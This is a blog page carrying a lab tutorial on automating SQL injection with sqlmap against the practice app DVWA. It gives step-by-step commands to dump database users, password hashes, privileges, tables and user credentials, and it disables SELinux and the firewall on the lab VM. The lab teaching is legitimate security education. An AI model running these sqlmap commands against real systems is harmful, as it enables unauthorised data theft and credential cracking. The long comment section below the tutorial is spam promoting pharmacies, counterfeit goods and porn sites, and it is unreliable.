Hướng Dẫn Thực Hành – Automate SQL Injection with SqlMap (DVWA): Lesson 7


Section 0. Background Information
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
        Tài liệu dùng cho mục đích học tập.
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Program –> VMWare –> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications –> Terminal
  2. Switch user to root
    • Instructions:
      1. su – root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
      3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Placing a “0” in the enforce file, puts selinux in permissive mode.
      2. sestatus
        • Notice that “Current mode:” changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
      2. service iptables stop
        • This command disables the firewall.
Section 5. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start –> All Program –> VMWare –> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 6. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 8. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora’s IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 9. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select “low”
      3. Click Submit
Section 10. Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select “SQL Injection” from the left navigation menu.
  2. Select Tamper Data
    • Instructions:
      1. Tools –> Tamper Data
  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper
  4. Basic Injection
    • Instructions:
      1. Input “1” into the text box.
      2. Click Submit.
    • Note:
      • The goal here is see the GET request being made to the CGI program behind the scenes.
      • Also, we will use the “Surname” output with SQLMAP to obtain database username and password contents.
  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? textbox is unchecked.
      2. Then Click Submit
  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy
  7. Open Notepad
    • Instructions:
      1. Applications –> Wine –> Programs –> Accessories –> Notepad
  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit –> Paste
  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy
  10. Pasting the Cookie Information
    • Instructions:
      1. Edit –> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py
  2. Obtain Database User For DVWA
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -b –current-db –current-user
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • –current-db, Retrieve DBMS current database
        • –current-user, Retrieve DBMS current user
  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y
  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the database name is “dvwa” and the programs that communicate with the database is “root@localhost”;
Section 12. Using SqlMap to Obtain Database Management Username and Password
  • NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
  1. Obtain Database Management Username and Password
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” –string=”Surname” –users –password
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -string, Provide a string set that is always present after valid or invalid query.
        • –users, list database management system users
        • –password, list database management password for system users.
  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes:
      1. Notice the password for username db_hacker was cracked.
  3. Obtain db_hacker Database Privileges
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -U db_hacker –privileges
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -U, Specify database management user
        • –privileges, list database management system user’s privileges
  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user “db_hacker” has administrative privileges
      2. Notice that “db_hacker” can log in from anywhere, via the “%” wildcard operator.
Section 13. Obtain a list of all Databases
  1. Obtain a list of all databases
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” –dbs
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • –dbs, List database management system’s databases.
  2. Review Results: Obtain a list of all databases
    • Note:
      1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain “dvwa” tables and contents
  1. Obtain “dvwa” tables and contents
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the “-u” flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the “–cookie” flag below.
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa –tables
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • –tables, List Database Tables
  2. Viewing “dvwa” tables and content results
    • Note:
      1. Notice sqlmap listed two tables: guestbook and users.
  3. Obtain columns for table dvwa.users
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa -T users –columns
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • –columns, List the Columns of the Database Table.
  4. Viewing Results: columns for table dvwa.users
    • Note:
      1. Notice that there are both a user and password columns in the dvwa.users table.
  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Instructions:
      1. ./sqlmap.py -u “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low” -D dvwa -T users -C user,password –dump
        • -u, Target URL
        • –cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • –dump, Dump table contents
  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What’s the dictionary location? <Press Enter>
      4. Use common password suffixes? y
  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes:
      1. Notice how sqlmap nicely displays passwords for each user.

Section 15. Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo “Your Name”
        • Replace the string “Your Name” with your actual name.
        • e.g., echo “John Gray”
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Email 2 CSIRT247@Gmail.Com

Comments

  • Adidas NMD XR1 Sapphire
    Trả lời

    Would you be fascinated about exchanging links?

  • yeezy boost
    Trả lời

    I actually wanted to compose a small comment so as to say thanks to you for the marvelous guidelines you are writing on this site. My incredibly long internet research has at the end of the day been recognized with sensible details to talk about with my relatives. I would tell you that we site visitors are unquestionably endowed to dwell in a fantastic site with many brilliant individuals with insightful opinions. I feel truly grateful to have encountered your entire webpages and look forward to really more amazing times reading here. Thanks once again for everything.
    yeezy boost http://urlr.be/short/yzyinc

  • off white hoodie
    Trả lời

    I happen to be writing to let you be aware of what a beneficial experience my wife’s princess obtained going through your web page. She figured out a good number of details, with the inclusion of what it is like to have a marvelous giving spirit to get certain people quite simply fully grasp a variety of impossible subject matter. You truly did more than visitors’ expected results. Thank you for presenting the warm and friendly, dependable, explanatory and also cool tips about this topic to Jane.
    off white hoodie http://www.offwhitehoodie.us.com

  • Adidas NMD x Supreme Red
    Trả lời

    Spot on with this write-up, I really think this website wants much more consideration. I抣l in all probability be once more to learn far more, thanks for that info.

  • adidas ultra boost
    Trả lời

    I have to express my respect for your kindness in support of those individuals that really want assistance with your question. Your very own commitment to passing the solution around turned out to be extraordinarily valuable and has frequently enabled employees like me to reach their desired goals. Your own interesting help can mean much to me and much more to my colleagues. Best wishes; from everyone of us.
    adidas ultra boost http://tropaadet.dk/ultraus

  • lebron soldier 11
    Trả lời

    I am glad for commenting to make you be aware of what a brilliant experience my wife’s princess had visiting the blog. She came to understand a good number of things, including what it is like to possess an awesome teaching mindset to make other folks smoothly completely grasp specific tortuous matters. You truly exceeded visitors’ desires. Many thanks for churning out those invaluable, trustworthy, informative and in addition cool guidance on your topic to Mary.
    lebron soldier 11 http://www.lebron-soldier11.us.com

  • Free auto approve list 7-27-2018
    Trả lời

    I added a new list. As you’ll see it’s bigger than most of them. I hope you all have had a great week!

  • AaronDoofe
    Trả lời

    wh0cd1083301 tadalafil

  • KennethDauth
    Trả lời

    wh0cd1083301 levaquin tabs

  • AaronDoofe
    Trả lời

    wh0cd1083301 methotrexate tablets

  • KennethDauth
    Trả lời

    wh0cd1083301 aripiprazole abilify

  • Brettpurce
    Trả lời

    wh0cd1083301 buy atenolol

  • KennethDauth
    Trả lời

    wh0cd1083301 viagra cheap online

  • AaronDoofe
    Trả lời

    wh0cd1083301 buy duloxetine

  • KennethDauth
    Trả lời

    wh0cd1083301 Tadalafil 20

  • AaronDoofe
    Trả lời

    wh0cd1083301 cephalexin 500

  • KennethDauth
    Trả lời

    wh0cd1083301 trazodone

  • AaronDoofe
    Trả lời

    wh0cd1083301 buy albuterol inhaler

  • KennethDauth
    Trả lời

    wh0cd1083301 levaquin

  • AaronDoofe
    Trả lời

    wh0cd1083301 viagra without prescription

  • AaronDoofe
    Trả lời

    wh0cd1083301 cialis

  • AaronDoofe
    Trả lời

    wh0cd1083301 kamagra pills

  • Free auto approve list 8-9-2018
    Trả lời

    I just wanted to let you all know that I added a new list. It has taken me awhile to let everyone know due to server issues. Everything should be back on track now.

    https://www.freeautoapprovelist.com/free-auto-approve-list-8-9-2018/

  • KennethDauth
    Trả lời

    wh0cd1083301 buy erythromycin

  • KennethDauth
    Trả lời

    wh0cd1083301 Albuterol Salbutamol

  • Brettpurce
    Trả lời

    wh0cd1083301 generic for albuterol

  • KennethDauth
    Trả lời

    wh0cd1083301 tadalafil

  • KennethDauth
    Trả lời

    wh0cd1083301 methotrexate online

  • KennethDauth
    Trả lời

    wh0cd1083301 web site

  • KennethDauth
    Trả lời

    wh0cd1083301 keflex without prescription

  • KennethDauth
    Trả lời

    wh0cd1083301 kamagra

  • Free auto approve list 8-9-2018
    Trả lời

    I’ve been having issues with my Windows hosting. It has set me back quite a bit while making the next list. This is the current list that I have. I should add another list in less than a week. I’ll let you all know when the next list is ready. Thank you for your patience.

    https://www.freeautoapprovelist.com/free-auto-approve-list-8-9-2018/

  • Brettpurce
    Trả lời

    wh0cd1083301 retin a

  • KennethDauth
    Trả lời

    wh0cd1083301 cialis online india

  • KennethDauth
    Trả lời

    wh0cd1083301 buy levaquin

  • Dallas
    Trả lời

    Wow, fantastic weblog structure! How lengthy have you been running a blog for?
    you make running a blog look easy. The whole glance of your website is wonderful,
    let alone the content!

    maglia Monaco poco prezzo

  • Reina
    Trả lời

    Great goods from you, man. I have understand your stuff
    previous to and you are just extremely wonderful.

    I really like what you’ve acquired here, really like what you’re saying and the way in which
    you say it. You make it entertaining and you still care for to keep it smart.
    I cant wait to read far more from you. This is
    really a great site.

    Roma ny trøje

  • Tory
    Trả lời

    Normally I do not learn article on blogs, however I wish to say that this write-up very forced me to take a look at and do so!
    Your writing style has been surprised me. Thank you, quite great post.

    Arsenal fotballdrakter 2018

  • Starla
    Trả lời

    I really like what you guys tend to be up too. This kind of clever
    work and reporting! Keep up the awesome works guys I’ve incorporated you guys to my personal blogroll.

    Arsenal fotbollströja barn

  • Juan
    Trả lời

    Hi, Neat post. There’s a problem with your website in internet explorer, would test this?

    IE nonetheless is the marketplace leader and a large element of
    other folks will leave out your great writing due to this problem.

    Ajax Fotballdrakt

  • Filomena
    Trả lời

    Excellent post. I was checking continuously this blog and I am impressed!
    Very useful info particularly the last part :
    ) I care for such info a lot. I was looking for this certain information for a long time.
    Thank you and good luck.

    Roma fodboldtrøje med tryk

  • Madge
    Trả lời

    Link exchange is nothing else but it is just placing the other person’s blog link on your page at suitable place and other person will also do same
    for you.

    Billige chelsea fodboldtrøjer

  • Merissa
    Trả lời

    We are a gaggle of volunteers and starting a new scheme in our community.

    Your website provided us with valuable info to work
    on. You have performed a formidable job and our whole community can be thankful
    to you.

    Schalke 04 tröja

  • Jeffery
    Trả lời

    Your style is so unique compared to other people I have read stuff from.

    Thank you for posting when you’ve got the opportunity,
    Guess I will just bookmark this page.

    Maglia Del inter

  • Vance
    Trả lời

    Great web site you have got here.. It’s difficult to find excellent
    writing like yours these days. I really appreciate people like you!
    Take care!!

    Billige fiorentina fodboldtrøjer

  • Wilfred
    Trả lời

    Hi, its pleasant piece of writing concerning media
    print, we all understand media is a wonderful source of facts.

    Manchester City tröja

  • Chasity
    Trả lời

    It’s perfect time to make some plans for the future and
    it is time to be happy. I’ve read this post
    and if I could I wish to suggest you few interesting things or advice.
    Maybe you can write next articles referring to this article.
    I desire to read more things about it!

    barcelona Fodboldtrøje

  • Shantae
    Trả lời

    Just desire to say your article is as surprising. The
    clearness on your put up is simply spectacular and that i can think you’re a professional in this subject.
    Fine along with your permission allow me to
    snatch your RSS feed to keep updated with forthcoming
    post. Thanks 1,000,000 and please continue the gratifying work.

    Maglie Roma

  • Julius
    Trả lời

    Good post. I learn something new and challenging on sites I
    stumbleupon everyday. It will always be useful to read
    content from other authors and practice a little something from their sites.

    Real Madrid Tröja

  • Linette
    Trả lời

    I was recommended this blog by my cousin. I am not sure whether this post is
    written by him as nobody else know such detailed about my problem.
    You are wonderful! Thanks!

    juventus drakt med trykk

  • redporn
    Trả lời

    one of the great articals .great work.

    http://combookmarkplan.gq/News/animal-and-toy-trailers/

  • Lucius Bakke gay cam
    Trả lời

    Mega good! Interesting information over this web. It is pretty worth enough for me. Personally, if all site owners and bloggers made good content as you did, the web will be much more useful than ever before. I could not refrain from commenting. I have spent 2 hours looking for such infos. I will also share it with some friends interested in it. I have just bookmarked this website. Done with the work done, I going to find some model sexy hot gay cams. Thanks!! Greetings from Orlando!

    virtual-cams.webnode.cat

  • wantclip
    Trả lời

    Hi, Neat post. There’s a problem with your web site in internet explorer, would test this… IE still is the market leader and a large portion of people will miss your magnificent writing because of this problem.

  • wantclip
    Trả lời

    Oh my goodness! a tremendous article dude. Thanks However I’m experiencing situation with ur rss . Don’t know why Unable to subscribe to it. Is there anybody getting similar rss downside? Anyone who knows kindly respond. Thnkx

  • Tristan Deviva gay cam
    Trả lời

    Mega good! Interesting information over this website. It is pretty worth enough for me. In my opinion, if all website owners and bloggers made good content as you did, the net will be a lot more useful than ever before. I couldn’t resist commenting. I’ve spent 1 hour trying to find such article. I’ll also share it with some friends interested in it. I’ve just bookmarked this website. Right now with the task done, I’ll watch some live sexy cams. Thank you!! Greetings from Californa!

    virtual-cams.webnode.cat

  • seemybed
    Trả lời

    I would like to thank you for the efforts you have put in writing this site. I’m hoping the same high-grade site post from you in the upcoming also. In fact your creative writing skills has encouraged me to get my own blog now. Actually the blogging is spreading its wings fast. Your write up is a good example of it.

  • Madalyn Roehrich
    Trả lời

    Have you ever considered publishing an ebook or guest authoring on other blogs? I have a blog centered on the same ideas you discuss and would love to have you share some stories/information. I know my subscribers would appreciate your work. If you’re even remotely interested, feel free to shoot me an e-mail.
    Madalyn Roehrich http://krkray.ru/board/user/profile/1277762

  • paykasa
    Trả lời

    Paykasa, 16 haneli pin kodundan oluşan, daha önce çok yaygın olarak kullanılan bir ön ödemeli kart türüne benzeyen, içerisinde euro bakiyesi olan bir ön ödemeli sanal karttır. İçerisindeki bakiyeler özel olarak üretilemediği için standart kart bakiyeleri 10, 20, 50, 100, 150, 250 tek kart bakiyesi olarak satılmaktadırlar. Tek kullanımlık bir kart olan paykasa kart, kullanılan sitede kartın bakiyesini girmenize gerek kalmadan sadece 16 haneli tek kullanımlık koduyla işlem yapmanıza olanak sağlamaktadır.

  • Likehorny
    Trả lời

    Hey there just wanted to give you a quick heads up and let you know a few of the images aren’t loading correctly. I’m not sure why but I think its a linking issue. I’ve tried it in two different web browsers and both show the same results.

  • SeeMyBeD
    Trả lời

    Whats up very cool blog!! Guy .. Beautiful .. Wonderful .. I’ll bookmark your site and take the feeds additionally…I’m glad to search out a lot of useful info here within the submit, we want work out more strategies in this regard, thanks for sharing. . . . . .

  • Kirby Sims
    Trả lời

    Greetings from Los angeles! I’m bored to tears at work so I decided to check out your site on my iphone during lunch break. I enjoy the knowledge you provide here and can’t wait to take a look when I get home. I’m shocked at how fast your blog loaded on my cell phone .. I’m not even using WIFI, just 3G .. Anyways, excellent site!
    Kirby Sims http://vccaforums.org/index.php?action=profile;u=40561

  • Colton Erholm gay cam
    Trả lời

    Cool one! Interesting tips over here. It is pretty worth enough for me. Personally, if all webmasters and bloggers made good content as you did, the net will be a lot more useful than ever before.| I couldn’t resist commenting. I have spent some time searching for such tips. I will also share it with some friends interested in it. I’ve just bookmarked this website. Done with the task done, I going to find some online homo cams. Thanks!!Greetings from Atlanta!

    virtual-cams.webnode.cat

  • Gerry Szafryk
    Trả lời

    How do I remove an image from my blogger sidebar?

    https://pornhubfree1987.tumblr.com

  • Micah Luisi
    Trả lời

    Thanks for sharing excellent informations. Your web site is so cool. I’m impressed by the details that you’ve on this site. It reveals how nicely you perceive this subject. Bookmarked this website page, will come back for more articles. You, my friend, ROCK! I found just the info I already searched all over the place and just could not come across. What a perfect web site.

  • eskişehir escort
    Trả lời

    It is in reality a great and useful piece of info. Thanks for sharing. 🙂

    http://www.eskisehirhentbol.com/

  • FirstClassPlaY
    Trả lời

    An interesting dialogue is price comment. I believe that it is best to write more on this subject, it won’t be a taboo topic however usually individuals are not enough to talk on such topics. To the next. Cheers

  • ClubWarp
    Trả lời

    Its like you read my thoughts! You appear to know so much about this, like you wrote the e-book in it or something. I believe that you just could do with some percent to force the message house a bit, but other than that, that is fantastic blog. An excellent read. I’ll certainly be back.

  • Jeffrey Strandburg
    Trả lời

    Hey There. I found your blog using msn. This is an extremely well written article. I will make sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will certainly comeback.
    Jeffrey Strandburg http://suhodae.com/board/486890

  • roma drakt med trykk
    Trả lời

    Excellent page, Stick to the very good job. thnx.|
    roma drakt med trykk http://www.nottheitgirls.com/roma-iq21.no

  • maglia Dortmund
    Trả lời

    Many thanks, this site is extremely handy.
    maglia Dortmund http://www.haeroo.com/Dortmund-bambini-33/

  • Chelsea tröja
    Trả lời

    What’s up, neat websites you possess there.
    Chelsea tröja http://www.afterglowvp.com/Chelsea-fotbollstroja-p-964230.cfm

  • Billige arsenal fodboldtrøjer
    Trả lời

    Great internet site! It looks really expert! Keep up the great job!
    Billige arsenal fodboldtrøjer http://www.crimsontee.com/arsenal/ozil-troeje-2016-37848/

  • JAV
    Trả lời

    I’ve been surfing online more than three hours today, yet I never found any interesting article like yours. It’s pretty worth enough for me. Personally, if all web owners and bloggers made good content as you did, the web will be a lot more useful than ever before.

  • Tracy Zotos gay cam
    Trả lời

    I like it! Interesting info over this web. It’s pretty worth enough for me. In my opinion, if all site owners and bloggers made good content as you did, the web will be a lot more useful than ever before.| I could not refrain from commenting. I ‘ve spent 3 hours trying to find such informations. I will also share it with some friends interested in it. I’ve just bookmarked this website. Done with the task done, I will visit some model gay cams. Merci!!Greetings from Orlando!

    virtual-cams.webnode.cat

  • Firstclassplay
    Trả lời

    hello!,I love your writing very a lot! share we be in contact extra approximately your article on AOL? I need a specialist on this area to resolve my problem. Maybe that’s you! Looking forward to see you.

  • Heyzo
    Trả lời

    Absolutely composed subject material, regards for information. “You can do very little with faith, but you can do nothing without it.” by Samuel Butler.

  • hotclip
    Trả lời

    I was studying some of your articles on this site and I believe this site is very instructive! Continue putting up.

  • sa
    Trả lời

    Woah this blog is wonderful i really like studying your articles. Keep up the good work! You understand, a lot of individuals are searching around for this info, you could aid them greatly.

    http://www.hafif.net

  • Collin Shults
    Trả lời

    The crux of your writing whilst sounding reasonable at first, did not really sit properly with me after some time. Somewhere throughout the sentences you actually were able to make me a believer but only for a very short while. I nevertheless have got a problem with your jumps in assumptions and one might do well to fill in those gaps. When you can accomplish that, I could surely be amazed.

  • Carmelita Orobona
    Trả lời

    Oh my goodness! an amazing article dude. Thank you Nevertheless I am experiencing problem with ur rss . Don’t know why Unable to subscribe to it. Is there anyone getting identical rss problem? Anybody who knows kindly respond. Thnkx

  • Josette Barasch
    Trả lời

    Hello, i think that i saw you visited my web site thus i came to “return the favor”.I am trying to find things to improve my site!I suppose its ok to use a few of your ideas!!

  • Henriette Weadon
    Trả lời

    Magnificent web site. Plenty of useful info here. I’m sending it to several friends ans additionally sharing in delicious. And naturally, thank you to your sweat!

  • Clemencia Steyer
    Trả lời

    Hello! Someone in my Facebook group shared this site with us so I came to look it over. I’m definitely enjoying the information. I’m book-marking and will be tweeting this to my followers! Superb blog and excellent design and style.

  • Vanna Bisel
    Trả lời

    Hi, Neat post. There is a problem with your website in internet explorer, would test this… IE still is the market leader and a good portion of people will miss your magnificent writing because of this problem.

  • Rex Schemmer
    Trả lời

    I’ve read a few excellent stuff here. Certainly price bookmarking for revisiting. I wonder how so much attempt you place to make this type of great informative website.

  • Cedric Waymer
    Trả lời

    My brother suggested I might like this website. He was totally right. This post actually made my day. You can not imagine just how much time I had spent for this information! Thanks!

  • Rosann Home
    Trả lời

    When I initially commented I clicked the -Notify me when new comments are added- checkbox and now every time a comment is added I get 4 emails with the identical comment. Is there any manner you can remove me from that service? Thanks!

  • Aleta Roddick
    Trả lời

    hi!,I like your writing so much! share we communicate more about your post on AOL? I need a specialist on this area to solve my problem. May be that’s you! Looking forward to see you.

  • Daniele Ambler
    Trả lời

    Every weekend i used to pay a quick visit this site, because i wish for enjoyment, since this this site conations genuinely good funny stuff too.

  • Tonia Oats
    Trả lời

    Greetings from Carolina! I’m bored at work so I decided to check out your site on my iphone during lunch break. I love the information you provide here and can’t wait to take a look when I get home. I’m surprised at how quick your blog loaded on my phone .. I’m not even using WIFI, just 3G .. Anyways, fantastic site!

  • Dalene Stribling
    Trả lời

    Hi there! Would you mind if I share your blog with my myspace group? There’s a lot of folks that I think would really enjoy your content. Please let me know. Cheers

  • Lavone Wigg
    Trả lời

    Hey There. I found your blog using msn. This is a really well written article. I will be sure to bookmark it and return to read more of your useful info. Thanks for the post. I’ll certainly comeback.

  • Dominique Mirabile
    Trả lời

    You made some respectable factors there. I regarded on the web for the issue and found most individuals will associate with with your website.